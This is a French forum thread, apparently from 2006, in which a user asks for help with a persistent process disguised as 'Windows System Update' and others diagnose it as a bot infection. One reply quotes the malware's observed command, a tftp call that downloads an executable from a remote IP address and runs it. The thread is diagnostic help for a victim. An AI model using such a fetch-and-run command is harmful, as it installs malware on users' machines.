Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

Virus ou bug windows update ?

16 réponses
Avatar
culpa
Bonjour,

voici les sympt=F4mes :

acc=E8s =E0 internet impossible (~pas de r=E9seau)

dans la base de registre
run : uifvfg.exe libell=E9 "Windows System Update"
services : uifvfg.exe libell=E9 "Windows System Update"

dans le gestionnaire des t=E2ches > processus
uifvfg.exe

si je termine le processus, miracle acc=E8s =E0 internet !!
j'efface toutes les entr=E9es de la base de registre, je red=E9marre le
PC

les trois (base de registre + gest. de t=E2che ) sont =E0 nouveau l=E0 !!!

mais Kaspersky, avast, anti-vir, etc (5 antivirus + antivirus en ligne)
n'ont trouv=E9 quoi que ce soit :(

Une id=E9e ?

Merci d'avance.

6 réponses

1 2
Avatar
Pascal Hambourg

Ensuite, on peut éventuellement prévenir Free/Proxad que son
client qui a l'adresse ci-dessus héberge des trucs douteux sur un
serveur TFTP.


Y en a tellement que j'ai abandonné...
Tu crois que ça sert à quelque chose ?


Je n'ai personnellement jamais eu à contacter Free pour ce genre de
problème, mais il y a quelques années une de mes connaissances a vu son
accès Free ADSL suspendu pour cause de machine vérolée.


Avatar
Nina Popravka
On Tue, 19 Sep 2006 19:16:40 +0200, Pascal Hambourg
wrote:

Je n'ai personnellement jamais eu à contacter Free pour ce genre de
problème, mais il y a quelques années une de mes connaissances a vu son
accès Free ADSL suspendu pour cause de machine vérolée.
Pfttttttt.... Je vois passer en moyenne trois merdes à la minute, dont

95% sont à un /16 de moi... Alors y a du taf...
--
Nina

Avatar
Rodolphe
Je vais peut etre en faire rire mais je croyais etre legerement protegé par
la neufbox.
Je viens de faire une reinstalle complete de mon Pc suite a changement de
config.
Quel surprise en installant en voulant me connecter pour la 3 iemme fois :
page blance et le pc qui se met a ramer.J'installe le SP2 ,et au redemarrage
le parefeu windwos me dit qu'un fichier "explore.exe" tente de se
connecter.Je le bloque et je decide de mettre la version d'essai de nod32.
Ni une ni 2 ,nod32 m'indique qu'un fichier douteux est detecté.
J'ai biensur decidé de tout formaté et de debrancher ma connection avant de
mettre a jour windwos .
Tout ca pour dire que meme derriere un semblant de parefeu ,le virus etait
rentré .Il avait deja desactivé les securité du SP2 .
Y en a meme qui modifie les données des AV pour qu'il ne fasse pas d'alerte.
Il est peut etre trop tard pour ton pc Culpa.
a moins que cela soit un simple espion non repertorié chez kasper mais ,ca
parait improbable.
--
A + .

Rodolphe.

(Adresse anti-spam)
Avatar
Yves Jean Marie Lambert
Nina Popravka wrote:
On 19 Sep 2006 05:28:51 -0700, wrote:

tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit
On fait quoi dans ces cas là ? ôO

On se dit qu'on a gagné un très joli bot :-)))))

Et on cherche où il est.



On écrit à pour signaler le problème et on passe sa
machine au kärcher (ne pas demander la méthode à Sarkozy mais plutôt aux
expérimentés d'hijackthis



Avatar
Yves Jean Marie Lambert
Nina Popravka wrote:
On 19 Sep 2006 06:08:19 -0700, wrote:

Et pourtant ce truc s'execute toutes les n minutes !!!
Ce truc communique...

Donc un netstat -b vous donnera le nom du process qui communique...


Non : C'est tftp qui s'éxécute. Netstat ne dira pas qui lance tftp.


Avatar
Yves Jean Marie Lambert
wrote:

C:WINDOWSExplorer.EXE


windows fait la différence entre minuscules et majuscules ?

1 2